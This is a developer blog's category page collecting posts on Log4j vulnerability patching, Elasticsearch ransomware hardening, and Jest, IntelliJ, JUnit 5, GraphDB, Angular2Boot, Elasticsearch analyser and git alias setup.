Category: Developer Productivity and Hacks

Efficiency tips, tools, and tricks that take the pain out of coding. From IDE extensions to debugging wizardry, these posts will help you ship better code faster—and have fun while doing it.

  • Log4j 2.16.0 Fixes Critical Vulnerabilities: What You must know

    Apache Log4j 2.16.0 is now available

    Apache Log4j 2.16.0 Is Now Available – Critical Update Required

    A new follow-on vulnerability in Log4j has been discovered and fixed in version 2.16.0, addressing CVE-2021-44228 and CVE-2021-45046. If you’re still using version 2.15.0 or earlier, your applications may remain vulnerable in certain non-default configurations.

    This is is a follow on from my previous post: Log4J Zero-Day Exploit: Explained with Fixes.

    Here’s why this update is critical and what you need to do.

    TL;DR

    If you’re short on time, here’s the gist:

    • Upgrade your Log4j library to version 2.16.0 immediately.
    • The newer version completely removes the risky message lookup feature, which was the critical enabler of these exploits.
    • Visit the Apache Security Page for the latest updates

    Why Version 2.15.0 Isn’t Enough

    While version 2.15.0 addressed initial vulnerabilities, it left certain configurations exposed. Specifically, using the Thread Context value in the log message Pattern Layout could still allow exploitation. Version 2.16.0 eliminates this risk by fully removing the message lookup functionality.

    Misleading Fixes to Avoid

    Not all solutions floating around the community are effective. Avoid relying on the following:

    • Updating just the Java version.
    • Filtering vulnerabilities using Web Application Firewalls (WAF).
    • Modifying the log statement format to %m{nolookup}.

    These approaches won’t fully mitigate the vulnerabilities, so upgrading to version 2.16.0 is your safest bet.

    How to Stay Updated

    The Log4j exploit has drawn global attention, leading to a flood of information—some of which may be inaccurate. For reliable updates, stick to trusted sources:

    What’s Next?

    This is an evolving situation, and further updates may arise. Bookmark the Apache Security Page and regularly check for announcements to stay ahead of potential risks.

  • Log4J Zero-Day Exploit: Explained with Fixes

    Note: Check out my latest blog for updated information and solutions on this issue: Log4j 2.16.0 Fixes Critical Vulnerabilities: What You Need to Know

    The best evidence I have seen so far is that of a little bobby table LinkedIn exploit 🫣

    Overview: What Is the Log4J Zero-Day Exploit (CVE-2021-44228)?

    A critical zero-day exploit affecting the widely used Log4J library has been identified and fixed in version 2.15.0. This vulnerability (CVE-2021-44228) allows attackers to gain complete control of your server remotely—making it one of the most dangerous Java-based vulnerabilities to date.

    For details, visit the Apache Log4j Security Page. This isn’t just a Java developer’s headache—it’s a wake-up call for every engineer, security specialist, and even non-Java tech teams whose tools rely on Log4J indirectly (looking at you, Elasticsearch and Atlassian users).

    This post explains:

    1. How the exploit works.
    2. How to check if you’re affected.
    3. Step-by-step fixes to secure your applications.

    Quick Summary

    • Upgrade Log4J to version 2.15.0 or later immediately.
    • Workarounds exist for systems where upgrading isn’t feasible (see below).
    • Popular apps like Elasticsearch, Minecraft, and Jira are affected.

    Understanding the Exploit

    The vulnerability lies in log4j-core versions 2.0-beta9 to 2.14.1. When an application logs user inputs using Log4J, the exploit allows malicious actors to execute arbitrary code remotely. In practical terms, if your app takes user input and logs it, you’re at risk.

    Am I Affected?

    If your system runs Java and incorporates log4j-core, either directly or through dependencies, assume you’re affected. Use tools like Maven or Gradle to identify the versions in your project. Here’s how:

    For Gradle

    ./gradlew dependencies | grep "log4j"

    For Maven

    ./mvn dependency:tree | grep log4j

    Most Java applications log user inputs, making this a near-universal issue. Be proactive and investigate now.

    How to Fix the Log4J Vulnerability

    1. Upgrade Your Log4J Version

    The most reliable solution is upgrading to Log4J 2.15.0 or newer. Here’s how for common tools:

    Maven

    <properties>  <log4j2.version>2.15.0</log4j2.version> 
    </properties>

    Then verify the fix with

    ./mvn dependency:list | grep log4j

    Gradle

    implementation(platform("org.apache.logging.log4j:log4j-bom:2.15.0"))

    Then confirm the version fix with

    ./gradlew dependencyInsight --dependency log4j-core

    2. Workarounds If Upgrading Isn’t Feasible

    For systems running Log4J 2.10 or later, use these temporary fixes:

    Add the system property

    Dlog4j2.formatMsgNoLookups=true

    Set the environment variable

    LOG4J_FORMAT_MSG_NO_LOOKUPS=true

    For JVM-based apps, modify the launch command

    java -Dlog4j2.formatMsgNoLookups=true -jar myapplication.jar

    Applications Known to Be Affected

    Even if you’re not directly using Log4J, many popular tools and libraries depend on it. Here’s a (non-exhaustive) list of systems at risk:

    • Libraries: Spring Boot, Struts
    • Applications: Elasticsearch, Kafka, Solr, Jira, Confluence, Logstash, Minecraft
    • Servers: Steam, Apple iCloud

    If you’re using any of these, check their documentation for specific patches or updates.

    Final Reminder: Why This Matters

    Apache has rated this vulnerability as critical. Exploiting it allows remote attackers to execute arbitrary code as the server user, potentially with root access. Worm-like attacks that propagate automatically are possible.

    To stay secure:

    1. Upgrade or apply workarounds immediately.
    2. Regularly monitor the Apache Log4j Security Page for updates.

    Additional Resources

  • How to Configure Jest for TypeScript in React or NodeJS Projects

    How to Configure Jest for TypeScript in React or NodeJS Projects

    Setting up Jest for TypeScript testing in React and NodeJS can streamline your development workflow and ensure high-quality code. This guide provides an opinionated, step-by-step process for configuring Jest with TypeScript support, whether you’re working on new or existing projects.

    1. Install Jest and Its Friends (Dependencies)

    Start by installing the necessary Jest packages along with TypeScript support:

    # Using Yarn
    yarn add --dev jest ts-jest @types/jest
    
    # Or using npm
    npm install --save-dev jest ts-jest @types/jest
    • ts-jest: A TypeScript preprocessor that lets Jest handle .ts and .tsx (TypeScript files).
    • @types/jest: Provides type definitions for Jest in TypeScript.

    2. Configure Jest with the Preprocessor

    Generate a basic Jest configuration using ts-jest:

    npx ts-jest config:init

    This command generates a jest.config.js file with the following contents:

    module.exports = {
      preset: 'ts-jest',
      testEnvironment: 'node',
    };

    3. Customize Your Jest Configuration (Optional)

    For advanced setups, you can extend your configuration to include code coverage and improved testing workflows:

    module.exports = {
      roots: ['<rootDir>/src'],
      preset: 'ts-jest',
      testEnvironment: 'node',
      coverageDirectory: 'coverage',
      verbose: true,
      collectCoverage: true,
      coverageThreshold: {
        global: {
          branches: 90,
          functions: 95,
          lines: 95,
          statements: 90,
        },
      },
      collectCoverageFrom: ['**/*.{ts,tsx}'],
      coveragePathIgnorePatterns: ['/node_modules/'],
      coverageReporters: ['json', 'lcov', 'text', 'clover'],
    }; 

    This configuration adds:

    • Code coverage thresholds to ensure high-quality tests.
    • A custom coverage directory.
    • Inclusion of TypeScript, TSX, and JSX files.

    For more advanced configurations, check the official Jest documentation.

    4. Add Jest Test Scripts to package.json

    Add custom scripts for testing workflows in your package.json file:

    {
      "scripts": {
        "test": "jest --coverage",
        "test:watch": "jest --watchAll",
        "test:nocoverage": "jest --watchAll --no-coverage"
      }
    }

    These scripts provide:

    • test: Runs all tests with coverage reports.
    • test:watch: Watches for changes and re-runs tests automatically.
    • test:nocoverage: Faster test runs without generating coverage reports.

    Congratulations if you got this far. This is a one-off set-up; you would rip the benefits in days to come. Follow on to test your Jest configuration for testing your Typescript React or NodeJs project.

    5. Verify the Setup with a Simple Test

    Create a simple function and its corresponding test file to confirm everything is configured correctly.

    Function (sum.ts):

    const sum = (a: number, b: number): number => a + b;
    export default sum;

    Test (sum.test.ts):

    import sum from './sum';
    
    describe('Addition function', () => {
      test('adds 1 + 2 to equal 3', () => {
        expect(sum(1, 2)).toBe(3);
      });
    });

    Run the test:

    yarn test

    6. Advanced Testing Workflow with Coverage Reports

    After running your tests, generate coverage reports for better visibility into untested areas of your codebase.

    Commands

    yarn test               # Runs tests with coverage
    yarn test:watch         # Continuously watches and runs tests
    yarn test:watch:nocoverage  # Faster feedback without coverage
    yarn global add serve   # Install `serve` to view reports
    yarn view:coverage      # Open the coverage reports as a static site 

    Example Test Outputs

    When running yarn test, you may see:

    Failing Test Example:

    yarn test Example console output with failing test.

    Passing Test Example

    yarn test Example console output with passing test.

    Now, fix any failing tests, and re-run the commands until all tests pass successfully.

    Why This Setup is Worth It

    This one-time Jest configuration significantly speeds up your TypeScript testing workflow. With proper coverage thresholds, easy-to-run scripts, and a reliable test runner like Jest, you’ll save time while improving your project’s overall quality.

    If you would like additional guidance, please take a look at the official Jest configuration guide.

    Furthermore, you can configure your IDE to generate boilerplate code snippets using this guide: React Code Snippet Generators with IntelliJ Idea

  • Boosting React Development with IntelliJ IDEA Code Snippets

    Boosting React Development with IntelliJ IDEA Code Snippets

    If you’re a fan of automation (and who isn’t?), IntelliJ IDEA’s code snippets are a game-changer for React development. As a Java developer diving into React, I’ve found these snippets invaluable for reducing typos, boilerplate, and the dreaded RSI (Repetitive Strain Injury). This guide walks you through generating React components using IntelliJ IDEA’s live templates, saving you time and effort.

    How to Generate Snippets in IntelliJ IDEA

    Before we go any further here is how to generate code snippet in IntelliJ Idea

    •  Simply type abbreviation name of the required snippet in the editor in the target file and press 
    • You can further narow the list suggestions by IntelliJ Idea by typing more characters of your abbrevation.

    Example: shortcuts to create snippets on Intellij Idea on a Mac:

    React Code Snippets Generator IntelliJ Idea
    1. Type ​`​rccp` in your editor
    2. Then press  to generate.

    Note:

    • Component name would be taken from the file name, example “ManageCoursePage.js”
    • For those on Visual Studio Code IDE the Code generation for React can be achieved with the Typescript React Code Snippet Extention

    React Code Snippet Examples

    1. React Component Class with PropTypes

    Abbreviation: rcp
    Steps:

    1. Type rcp in the editor.
    2. Press Tab to generate the snippet.

    Generated Snippet:

    import React, { Component } from 'react';
    import PropTypes from 'prop-types';
    
    class ManageCoursePage extends Component {
      render() {
        return <div>{/* Your code here */}</div>;
      }
    }
    
    ManageCoursePage.propTypes = {};
    export default ManageCoursePage; 

    2. React Component Class with ES6 Module System

    Abbreviation: rcc
    Steps:

    1. Type rcc in the editor.
    2. Press Tab to generate the snippet.

    Generated Snippet:

     import React, { Component } from 'react';
    
    class ManageCoursePage extends Component {
      render() {
        return <div>{/* Your code here */}</div>;
      }
    }
    
    export default ManageCoursePage;

    3. React Component Class Connected to Redux with Dispatch

    Abbreviation: rdc
    Steps:

    1. Type rdc in the editor.
    2. Press Tab to generate the snippet.

    Generated Snippet:

    import React, { Component } from 'react';
    import { connect } from 'react-redux';
    
    function mapStateToProps(state) {
      return {};
    }
    
    function mapDispatchToProps(dispatch) {
      return {};
    }
    
    class ManageCoursePage extends Component {
      render() {
        return <div>{/* Your code here */}</div>;
      }
    }
    
    export default connect(mapStateToProps, mapDispatchToProps)(ManageCoursePage); 

    4. React Component Class with PropTypes and Lifecycle Methods

    Abbreviation: rcfc
    Steps:

    1. Type rcfc in the editor.
    2. Press Tab to generate the snippet.

    Generated Snippet:

    import React, { Component } from 'react';
    import PropTypes from 'prop-types';
    
    class ManageCoursePage extends Component {
      constructor(props) {
        super(props);
      }
    
      componentWillMount() {}
    
      componentDidMount() {}
    
      componentWillReceiveProps(nextProps) {}
    
      shouldComponentUpdate(nextProps, nextState) {
        return true;
      }
    
      componentWillUpdate(nextProps, nextState) {}
    
      componentDidUpdate(prevProps, prevState) {}
    
      componentWillUnmount() {}
    
      render() {
        return <div>{/* Your code here */}</div>;
      }
    }
    
    ManageCoursePage.propTypes = {};
    export default ManageCoursePage; 

    Customising IntelliJ Snippets

    React Code Snippets Generator IntelliJ Idea Manage
    IntelliJ idea live template view

    To create or modify snippets in IntelliJ IDEA:

    1. Open Preferences > Editor > Live Templates.
    2. Add new templates or tweak existing ones to match your development style.

    These templates can also be shared across teams to maintain consistency and reduce onboarding time.

    Congratulations! You’ve successfully set up Jest for TypeScript testing in React and NodeJS and integrated IntelliJ IDEA to 10x your workflow. Now! No excuses not to follow a test-driven approach (TDD) and automated testing, which will eventually lead to faster development and more confidence in shipping more frequently

    Conclusion

    IntelliJ IDEA snippets are a fantastic way to save time and reduce errors when working with React. Whether you’re generating PropTypes, lifecycle methods, or Redux-connected components, these templates make development faster and less repetitive. Explore IntelliJ’s live template feature to customise your workflow and share these snippets with your team for maximum efficiency.

    For more automation tips, check out IntelliJ IDEA’s documentation on live templates.

    For more resources

  • Upgrading from JUnit 4 to JUnit 5 in Spring Boot Applications

    Upgrading from JUnit 4 to JUnit 5 in Spring Boot Applications

    Migrating from JUnit 4 to JUnit 5 (Jupiter) can feel daunting, especially if your project is built on older versions of Spring Boot. This guide breaks down the process step-by-step, helping you navigate dependency adjustments, IDE tweaks, and annotation replacements.

    Prerequisite: Spring Boot Compatibility

    Before starting, note that the SpringExtension required for JUnit 5 is only available starting from Spring 5. Unfortunately, spring-boot-starter-test 1.5.x is based on Spring 4, meaning JUnit 5 isn’t natively supported until you upgrade to Spring Boot 2.x or later.

    For more details, check:

    Step 1: Adjust Dependencies

    To use JUnit 5 in a Spring Boot project, you’ll need to exclude the default JUnit 4 dependency and explicitly add JUnit 5 dependencies.

    Current Dependency Configuration (JUnit 4)

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-test</artifactId>
        <scope>test</scope>
    </dependency> 

    Updated Dependency Configuration (JUnit 5)

    Exclude JUnit 4 and add JUnit 5 dependencies:

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-test</artifactId>
        <scope>test</scope>
        <exclusions>
            <exclusion>
                <groupId>junit</groupId>
                <artifactId>junit</artifactId>
            </exclusion>
        </exclusions>
    </dependency>
    <dependency>
        <groupId>org.junit.jupiter</groupId>
        <artifactId>junit-jupiter</artifactId>
        <scope>test</scope>
    </dependency> 

    Step 2: Update Imports

    With JUnit 5, most of the imports and annotations from JUnit 4 have been replaced. Use your IDE to quickly update these references.

    Global Find and Replace:

    1. Replace Imports
      • import org.junit.Test
        • import org.junit.jupiter.api.Test
      • import org.junit.runner.RunWith
        • import org.junit.jupiter.api.extension.ExtendWith
      • import org.springframework.test.context.junit4.SpringRunner
        • import org.springframework.test.context.junit.jupiter.SpringExtension
    2. Replace Annotations
      • @RunWith(SpringRunner.class)
        • @ExtendWith(SpringExtension.class)

    Step 3: Replace Annotations in Test Classes

    After updating imports, your test classes need to use JUnit 5’s new annotations.

    Before (JUnit 4)

    import org.junit.Test;
    import org.junit.runner.RunWith;
    import org.springframework.test.context.junit4.SpringRunner;
    
    @RunWith(SpringRunner.class)
    public class ExampleTest {
        @Test
        public void shouldPass() {
            // test logic
        }
    } 

    After (JUnit 5)

    import org.junit.jupiter.api.Test;
    import org.junit.jupiter.api.extension.ExtendWith;
    import org.springframework.test.context.junit.jupiter.SpringExtension;
    
    @ExtendWith(SpringExtension.class)
    public class ExampleTest {
        @Test
        public void shouldPass() {
            // test logic
        }
    } 

    Step 4: Use IDE Features for Dependency Updates

    adding Junit5 to the classpath

    If you’re using IntelliJ IDEA or similar IDEs, enable dependency management features to simplify updating your pom.xml. Use the following snippets if you prefer manual configuration:

    <dependency>
        <groupId>org.junit.jupiter</groupId>
        <artifactId>junit-jupiter-api</artifactId>
        <scope>test</scope>
    </dependency> 

    Why Upgrade to JUnit 5?

    JUnit 5 offers several advantages over JUnit 4, including:

    • Better modularity: You can use only the features you need.
    • New annotations: More flexibility with @BeforeEach, @AfterEach, and others.
    • Parameter injection: Cleaner test code through parameterized tests.

    Conclusion

    Upgrading from JUnit 4 to JUnit 5 in Spring Boot applications ensures your project stays up-to-date with modern testing frameworks. For more customisation, you can explore the official JUnit 5 documentation.

    Let me know how the migration process goes, and happy testing!

  • GraphDB Connectors with Elasticsearch: Semantic Search Made Powerful

    GraphDB Connectors with Elasticsearch: Semantic Search Made Powerful

    GraphDB connectors allow you to leverage Elasticsearch’s full-text search capabilities for enhanced semantic search. In this guide, we’ll configure a GraphDB connector for Elasticsearch, execute SPARQL queries, and demonstrate debugging techniques to ensure seamless integration.

    Pre-requisites

    Before diving into the setup, ensure the following are in place:

    GrapghDB Locations And Repo configuration screenshot
    1. GraphDB Installation: Ensure you have an installed instance of GraphDB (Enterprise edition is required for connectors).
    2. Elasticsearch Installation: Install and configure Elasticsearch with the following:
      • Port 9300 must be open and running (configured in /config/elasticsearch.yml or through Puppet/Chef).
      • If using Vagrant, ensure ports 9200, 9300, and 12055 are forwarded to your host.

    Step 1: Prepare GraphDB

    1. Set up your GraphDB instance.
    2. Specify your repository and write data to it.

    Step 2: Create Elasticsearch Connector

    To create a connector, follow these steps:

    1. Navigate to the SPARQL tab in GraphDB.

    2. Insert the following query and click Run:

      SPARQL Query:

      PREFIX : <http://www.ontotext.com/connectors/elasticsearch#>
      PREFIX inst: <http://www.ontotext.com/instance/>
      
      INSERT DATA {
        inst:my_index :createConnector '''
        {
          "elasticsearchCluster": "vagrant",
          "elasticsearchNode": "localhost:9300",
          "types": ["http://www.ontotext.com/example/wine#Wine"],
          "fields": [
            {"fieldName": "grape", "propertyChain": ["http://www.ontotext.com/example/wine#hasGrape"]},
            {"fieldName": "sugar", "propertyChain": ["http://www.ontotext.com/example/wine#hasSugar"], "orderBy": true},
            {"fieldName": "year", "propertyChain": ["http://www.ontotext.com/example/wine#hasYear"]}
          ]
        }
        ''' .
      }
      

      3. Confirm the new connector in Elasticsearch by verifying the creation of my_index (it will be empty initially).

      4. Debug the connector using these queries to check for connectivity and status:

      List Connectors:

      PREFIX : <http://www.ontotext.com/connectors/elasticsearch#>
      
      SELECT ?cntUri ?cntStr {
        ?cntUri :listConnectors ?cntStr .
      }

      Check Connector Status:

      PREFIX : <http://www.ontotext.com/connectors/elasticsearch#>
      
      SELECT ?cntUri ?cntStatus {
        ?cntUri :connectorStatus ?cntStatus .
      }

      Step 3: Insert Data into GraphDB

      Ensure your connector listens for data changes by inserting, updating, or syncing data with the corresponding Elasticsearch copy. Use the following data insertion example:

      SPARQL Data Insertion:

      @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
      @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#>
      @prefix xsd: <http://www.w3.org/2001/XMLSchema#>
      @prefix : <http://www.ontotext.com/example/wine#>
      
      :RedWine rdfs:subClassOf :Wine .
      :WhiteWine rdfs:subClassOf :Wine .
      :RoseWine rdfs:subClassOf :Wine .
      
      :Merlo rdf:type :Grape ; rdfs:label "Merlo" .
      :CabernetSauvignon rdf:type :Grape ; rdfs:label "Cabernet Sauvignon" .
      :CabernetFranc rdf:type :Grape ; rdfs:label "Cabernet Franc" .
      :PinotNoir rdf:type :Grape ; rdfs:label "Pinot Noir" .
      
      :Yoyowine rdf:type :RedWine ;
        :madeFromGrape :CabernetSauvignon ;
        :hasSugar "dry" ;
        :hasYear "2013"^^xsd:integer . 

      Debugging Tips

      1. Use the SPARQL queries above to validate your setup.
      2. Ensure Elasticsearch logs show successful connector interactions.
      3. Check that my_index in Elasticsearch reflects the inserted data from GraphDB.

      Conclusion

      Configuring GraphDB connectors with Elasticsearch allows you to combine semantic search sophistication with Elasticsearch’s robust full-text search capabilities. This integration unlocks advanced search and analytics for your data. Use the steps and SPARQL queries above to ensure a seamless setup.

      For more insights, explore the GraphDB documentation and Elasticsearch official guide.

    1. TypeScript is Great, But Sometimes You Just Want Java

      TypeScript is Great, But Sometimes You Just Want Java

      TypeScript has become the de facto language for Angular development, and for good reason—it’s easy to learn, strongly typed, and less error-prone than JavaScript. But what if you prefer Java for its mature tooling, strong object-oriented features, and familiarity? Enter Angular2Boot—a framework built on Angular 2, GWT, and Spring Boot that lets you write Angular 2 apps in Java 8.

      This guide walks you through setting up and running an Angular 2 app in Java 8 using Angular2Boot.

      Why Angular2Boot?

      Angular2Boot bridges the gap between modern frontend development and Java’s robust backend ecosystem. It’s particularly useful for smaller applications where splitting the app into multiple tiers (WebClient, Service, Backend REST API) might feel like overkill.

      Key Benefits

      1. Stronger Typing: Java provides even stronger type-checking compared to TypeScript.
      2. Mature Tooling: Java offers tried-and-tested tools and IDEs for streamlined development.
      3. Simplified Deployment: Package everything into one Spring Boot jar for production-ready builds.
      4. Robustness: Java remains a go-to language for building scalable, enterprise-grade applications.

      Getting Started with Angular2Boot

      Step 1: Create the Project

      Generate an Angular and GWT app using Maven archetype:

      mvn archetype:generate 
        -DarchetypeGroupId=fr.lteconsulting 
        -DarchetypeArtifactId=angular2-gwt.archetype 
        -DarchetypeVersion=1.6 

      During the setup process, provide the following details:

      • Group ID: com.mosesmansaray.play
      • Artifact ID: angular-gwt-in-java8-example
      • Version: 1.0-SNAPSHOT
      • Package Name: com.mosesmansaray.play

      This will create a project scaffold with all the necessary dependencies and configurations.

      Step 2: Install Dependencies

      Build the project to install all required dependencies and produce an executable JAR file:

      mvn clean install

      The resulting JAR file will be located in your target folder:

      /angular-gwt-in-java8-example/target/angular-gwt-in-java8-example-1.0-SNAPSHOT.jar
      

      Step 3: Run the Application

      Run the fat JAR file to start your application:

      java -jar target/angular-gwt-in-java8-example-1.0-SNAPSHOT.jar
      

      Step 4: Development with Live Reload

      During development, you can enable live reload for both backend and frontend:

      Backend:

      mvn spring-boot:run

      Frontend:

      mvn gwt:run-codeserver

      This ensures a seamless development workflow with real-time updates.


      Resources for Further Exploration

      1. Library Source Code: Explore the codebase.
      2. GWT con 2016 Talk: Watch here
      3. Speaker Deck Slides: A great overview of Angular2Boot.
      4. Code Demos:

      Conclusion

      Angular2Boot allows developers to harness the power of Angular 2 while benefiting from Java’s strong typing, mature tooling, and simplified deployment. Brilliant for when you’re prototyping or building enterprise-grade systems, Angular2Boot bridges the gap between modern frontend frameworks and Java’s backend ecosystem.

      Try it and experience the best of both worlds! Let me know what you think.

    2. Elasticsearch Ransomware: A Wake-Up Call for Admins

      Elasticsearch Ransomware: A Wake-Up Call for Admins

      By now, we’ve all seen this coming. With MongoDB falling victim to ransomware attacks, other NoSQL technologies like Elasticsearch were bound to follow. The alarming truth? Many Elasticsearch clusters are still open to the internet, vulnerable to attackers exploiting weak security practices, default configurations, and exposed ports.

      This guide covers essential steps to protect your Elasticsearch cluster from becoming the next target.

      TL;DR: Essential Security Measures

      1. Use X-Pack Security: If possible, implement Elastic’s built-in security features.
      2. Do Not Expose Your Cluster to the Internet: Keep your cluster isolated from public access.
      3. Avoid Default Configurations: Change default ports and settings to reduce predictability.
      4. Disable HTTP Access: If not required, disable HTTP access to limit attack vectors.
      5. Use a Firewall or Reverse Proxy: Implement security layers like Nginx, VPN, or firewalls (example Nginx config).
      6. Disable Scripts: Turn off scripting unless absolutely necessary.
      7. Regular Backups: Use tools like Curator to back up your data regularly.

      The Ransomware Playbook

      Ransomware attackers are targeting Elasticsearch clusters, wiping out data, and leaving ransom notes like this:

      “Send 0.2 BTC (bitcoin) to this wallet xxxxxxxxxxxxxx234235xxxxxx343xxxx if you want to recover your database! Send your service IP to this email after payment: xxxxxxx@xxxxxxx.org.”

      Their method is straightforward:

      • Target: Internet-facing clusters with poor configurations.
      • Exploit: Clusters with no authentication, default ports, and exposed HTTP.
      • Action: Wipe the cluster clean and demand payment.

      Why Are Clusters Vulnerable?

      Many Elasticsearch admins overlook basic security practices, leaving clusters open to the internet without authentication or firewall protection. Even clusters with security measures are often left with weak passwords, exposed ports, and unnecessary HTTP enabled.

      The lesson? Default settings are dangerous. Attackers are actively scanning for such vulnerabilities.

      How to Protect Your Elasticsearch Cluster

      1. Use Elastic’s X-Pack Security

      X-Pack, Elastic’s security plugin, provides out-of-the-box protection with features like:

      • User authentication and role-based access control (RBAC).
      • Encrypted communication.
      • Audit logging.

      If you’re using Elastic Cloud, these protections are enabled by default.

      2. Avoid Exposing Your Cluster to the Internet

      Isolate your cluster from public access:

      • Use private IPs or a Virtual Private Network (VPN).
      • Block all inbound traffic except trusted sources.

      3. Change Default Ports and Configurations

      Avoid predictability by changing Elasticsearch’s default port (9200) and disabling unnecessary features like HTTP if they aren’t required.

      4. Implement Firewalls and Reverse Proxies

      Add security layers between your cluster and potential attackers:

      • Use a reverse proxy like Nginx or Apache.
      • Configure firewall rules to allow only trusted IPs.

      5. Disable Scripting

      Unless absolutely necessary, disable Elasticsearch’s scripting capabilities to minimize attack surfaces. You can disable scripts in the elasticsearch.yml configuration file:

      script.allowed_types: none

      6. Regular Backups with Curator

      Data loss is inevitable without backups. Use tools like Elasticsearch Curator to regularly back up your data. Store snapshots in a secure, offsite location.

      Additional Resources

      Closing Thoughts

      Elasticsearch ransomware attacks are a stark reminder of the importance of proactive security measures. Whether you’re hosting your cluster on Elastic Cloud or self-managing it, adopting the security best practices outlined here will safeguard your data from malicious actors.

      Remember:

      • Change default configurations.
      • Isolate your cluster from the internet.
      • Regularly back up your data.

      If your Elasticsearch cluster is unprotected, the time to act is now—don’t wait until it’s too late.

    3. Cleaning Elasticsearch Data Before Indexing

      Cleaning Elasticsearch Data Before Indexing

      When dealing with Elasticsearch, sometimes you can’t control the format of incoming data. For instance, HTML tags may slip into your Elasticsearch index, creating unintended or unpredictable search results.

      Example Scenario:
      Consider the following HTML snippet indexed into Elasticsearch:

      <a href="http://somedomain.com">website</a>

      A search for somedomain might match the above link 🫣, but users rarely expect that. To avoid such issues, use a custom analyser to clean the data before indexing. This guide shows you how to clean and debug Elasticsearch data effectively.

      Step 1: Create a New Index with HTML Strip Mapping

      Create a new index with a custom analyzer that uses the html_strip character filter to clean your data.

      PUT Request:

      PUT /html_poc_v3
      {
        "settings": {
          "analysis": {
            "analyzer": {
              "my_html_analyzer": {
                "type": "custom",
                "tokenizer": "standard",
                "char_filter": ["html_strip"]
              }
            }
          }
        },
        "mappings": {
          "html_poc_type": {
            "properties": {
              "body": {
                "type": "string",
                "analyzer": "my_html_analyzer"
              },
              "description": {
                "type": "string",
                "analyzer": "standard"
              },
              "title": {
                "type": "string",
                "analyzer": "my_html_analyzer"
              },
              "urlTitle": {
                "type": "string"
              }
            }
          }
        }
      }

      Step 2: Post Sample Data

      Add some sample data to the newly created index to test the analyzer.

      POST Request:

      POST /html_poc_v3/html_poc_type/02
      {
        "description": "Description <p>Some déjà vu <a href=\"http://somedomain.com\">website</a>",
        "title": "Title <p>Some déjà vu <a href=\"http://somedomain.com\">website</a>",
        "body": "Body <p>Some déjà vu <a href=\"http://somedomain.com\">website</a>"
      } 

      Step 3: Retrieve Indexed Data

      To inspect the cleaned data, use the _search API with custom script fields to bypass the _source field and retrieve the actual indexed tokens.

      GET Request:

      GET /html_poc_v3/html_poc_type/_search?pretty=true
      {
        "query": {
          "match_all": {}
        },
        "script_fields": {
          "title": {
            "script": "doc[field].values",
            "params": {
              "field": "title"
            }
          },
          "description": {
            "script": "doc[field].values",
            "params": {
              "field": "description"
            }
          },
          "body": {
            "script": "doc[field].values",
            "params": {
              "field": "body"
            }
          }
        }
      }

      Example Response

      Here’s an example response showing the cleaned tokens for title, description, and body fields:

      {
        "took": 2,
        "timed_out": false,
        "_shards": {
          "total": 5,
          "successful": 5,
          "failed": 0
        },
        "hits": {
          "total": 1,
          "max_score": 1,
          "hits": [
            {
              "_index": "html_poc_v3",
              "_type": "html_poc_type",
              "_id": "02",
              "_score": 1,
              "fields": {
                "title": [
                  "Some",
                  "Title",
                  "déjà",
                  "vu",
                  "website"
                ],
                "body": [
                  "Body",
                  "Some",
                  "déjà",
                  "vu",
                  "website"
                ],
                "description": [
                  "a",
                  "agrave",
                  "d",
                  "description",
                  "eacute",
                  "href",
                  "http",
                  "j",
                  "p",
                  "some",
                  "somedomain.com",
                  "vu",
                  "website"
                ]
              }
            }
          ]
        }
      }

      Further Cleaning Elasticsearch Data References

      For additional resources, explore the following links:


      Conclusion

      Cleaning Elasticsearch data using custom analyzers and filters like html_strip ensures accurate and predictable indexing. By following the steps in this guide, you can avoid unwanted behavior and maintain clean, searchable data. Use the provided resources to further enhance your Elasticsearch workflow.

    4. Git Alias Configuration: Work Smarter, Not Harder

      Git Alias Configuration: Work Smarter, Not Harder

      Git is an indispensable tool for developers, but typing repetitive commands can slow you down. With Git aliases, you can create short and intuitive commands to streamline your workflow.

      Here’s how to configure your Git aliases for maximum efficiency.


      Step 1: Edit Your .gitconfig File

      Your .gitconfig file is typically located in your $HOME directory. Open it using your favorite editor:

      vim ~/.gitconfig

      Step 2: Add Basic Git Configurations

      Here’s an example of what your .gitconfig might look like:

      [core]
          excludesfile = /Users/moses.mansaray/.gitignore_global
          autocrlf = input
      
      [user]
          name = moses.mansaray
          email = moses.mansaray@domain.com
      
      [push]
          default = simple

      Step 3: Add Useful Git Aliases

      Below are some handy Git aliases to boost your productivity:

      [alias]
          # Shortcuts for common commands
          co = checkout
          cob = checkout -b
          cod = checkout develop
          ci = commit
          st = status
      
          # Save all changes with a single command
          save = "!git add -A && git commit -m"
      
          # Reset commands
          rhhard-1 = reset --hard HEAD~1
          rhhard-o = reset head --hard
      
          # View logs in various formats
          hist = log --pretty=format:\"%h %ad | %s%d [%an]\" --graph --date=short
          llf = log --pretty=format:\"%C(yellow)%h%C(red)%d%C(reset)%s%C(blue) [%cn]\" --decorate --numstat
          lld = log --pretty=format:\"%C(yellow)%h %ad%C(red)%d%C(reset)%s%C(blue) [%cn]\" --decorate --date=short
      
          # View file details
          type = cat-file -t
          dump = cat-file -p
      
          # Amend commits easily
          amend = commit -a --amend

      Alias Highlights

      1. Branch Management:
        • co: Checkout an existing branch.
        • cob: Create and switch to a new branch.
        • cod: Switch to the develop branch.
      2. Commit Management:
        • ci: Shortcut for git commit.
        • save: Adds all changes and commits with a single command.
      3. Reset Commands:
        • rhhard-1: Resets to the previous commit (HEAD~1).
        • rhhard-o: Resets the current head completely.
      4. Log Views:
        • hist: Visualize commit history in a graph with formatted output.
        • llf and lld: View logs with decorations and detailed information.
      5. File Details:
        • type and dump: Inspect Git objects in detail.
      6. Quick Fixes:
        • amend: Quickly modify the most recent commit.

      Step 4: Test Your Aliases

      After saving your .gitconfig file, test your new aliases in the terminal:

      git st    # Check status
      git cob feature/new-feature  # Create and switch to a new branch
      git hist  # View the commit history

      Conclusion

      With your aliases set, you now have a simple yet powerful way to save time and reduce errors in your Git workflow. Enjoy turning repetitive tasks into one-liners.

      Do you have a favourite Git alias that isn’t on this list? Share it in the comments below!